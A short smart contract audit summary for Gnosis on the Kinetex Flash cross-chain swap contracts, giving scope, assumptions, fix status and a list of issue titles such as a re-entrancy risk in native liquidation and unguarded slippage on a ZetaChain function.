This document presents the finding of a smart contract audit conducted by Côme du Crest for Gnosis.

Scope

A private repository has been created specifically for this audit. The scope includes all contracts within flash-contracts-audit/contracts/ as of commit d77ae0e excluding flash-contracts-audit/contracts/test/ expected to hold mock contracts and other contracts useful for testing.

Context

The goal of Kinetex Flash is to enable swapping of assets across different blockchains.

ERC20 tokens are used extensively throughout the protocol. I assume none of these tokens implement a blacklist or are rebasing tokens which would open unreported vulnerabilities. I assume tokens are known and trusted ERC20 tokens that do not attempt re-entrancy attacks on the protocol.

Status

The report has been sent to development team.

The development team wrote an audit response document Kinetex-Audit-Response.

Fixes have been implemented in commit a683f4d of branch flash-contracts-audit/tree/fix-audit. All issues have been either fixed or acknowledged. Additionally, gas estimation contracts and functions have been added that present no apparent vulnerability.

Issues

[High] Re-entrancy attack on native liquidation

[High] BitcoinProofVerifier wrongly assumes ASSET_NO_SEND_SIG is sent by order.fromActor

[Med] Miss-aligned incentives for Bitcoin send event report

[Info] Limited support for ERC1271

[Info] CollateralUnlocker._sendBalance() may run out of gas

[Info] Unfilled order sends collateral to order.fromActorReceiver which may be unexpected on collateral chain

[Info] Wormhole cross-chain payload send does not refund overpaid gas

[Info] ZetaChain onZetaRevert() is implemented in wrong contract

[Info] ZetaChain getZetaFromEth() can be sandwiched due to no slippage